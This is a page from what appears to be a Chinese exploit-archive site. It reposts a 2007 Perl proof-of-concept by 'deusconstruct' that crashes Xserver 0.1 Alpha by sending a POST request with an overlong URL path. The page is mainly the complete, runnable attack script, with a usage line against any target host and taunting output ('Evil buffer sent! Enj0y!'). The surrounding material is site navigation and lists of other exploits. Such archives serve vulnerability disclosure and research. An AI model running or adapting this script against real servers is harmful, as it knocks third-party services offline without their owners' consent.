首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Xserver Alpha Post Request Remote Buffer Overflow Exploit
来源:www.vfocus.net 作者:deusconstruct 发布时间:2007-07-24  
#!/usr/bin/perl
#
#      _                                    _                   _ 
#   __| | ___ _   _ ___  ___ ___  _ __  ___| |_ _ __ _   _  ___| |_
#  / _` |/ _ \ | | / __|/ __/ _ \| '_ \/ __| __| '__| | | |/ __| __|
# | (_| |  __/ |_| \__ \ (_| (_) | | | \__ \ |_| |  | |_| | (__| |_
#  \__,_|\___|\__,_|___/\___\___/|_| |_|___/\__|_|   \__,_|\___|\__|
#                      d.e.u.s..c.o.n.s.t.r.u.c.t
#
# Type       -> Proof-of-Concept (P0C) Remote DoS Buffer Overflow
# App        -> Xserver 0.1 Alpha
# URL       -> http://sourceforge.net/projects/xserver/
# Found By   -> deusconstruct
#
# Stack trace:
# Frame     Function  Args
# 18FDC978  610DE824  (41414141, 004020E4, 0040202E, 00000000)
# 18FDCD58  004015D4  (41414141, 41414141, 41414141, 41414141)
#
# Usage: perl xserver-dos-poc.pl www.target.com

use LWP::UserAgent;

$uniq = LWP::UserAgent->new;
$url = shift or die("Please insert a target domain or IP!");
$buffer = 150; # Teh evil 0verflow ammount

print "\n============================\n";
print "Xserver 0.1 Alpha Remote DoS\n";
print "DiSc0vEreD by deusconstruct\n";
print "============================\n";
print "\n";
print "[+] Sending evil buffer to $url ...\n";
$req = HTTP::Request->new(POST => "http://$url/" . A x $buffer);
$res = $uniq->request($req);
print "[+] Evil buffer sent! Enj0y!\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Windows Explorer.exe Gif Im
·PHP 5.2.3 win32std ext. safe_m
·Zenturi NixonMyPrograms Class
·Entertainment CMS (Local Inclu
·JBlog 1.0 Create / Delete Admi
·Windows RSH daemon 1.7 Remote
·Data Dynamics ActiveReport Act
·PHP <= 5.2.3 snmpget() object
·Lotus Domino IMAP4 Server 6.5.
·PHP 5.2.3 tidy_parse_string()
·PHP <= 5.2.3 snmpget() object
·IPSwitch IMail Server 2006 SEA
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved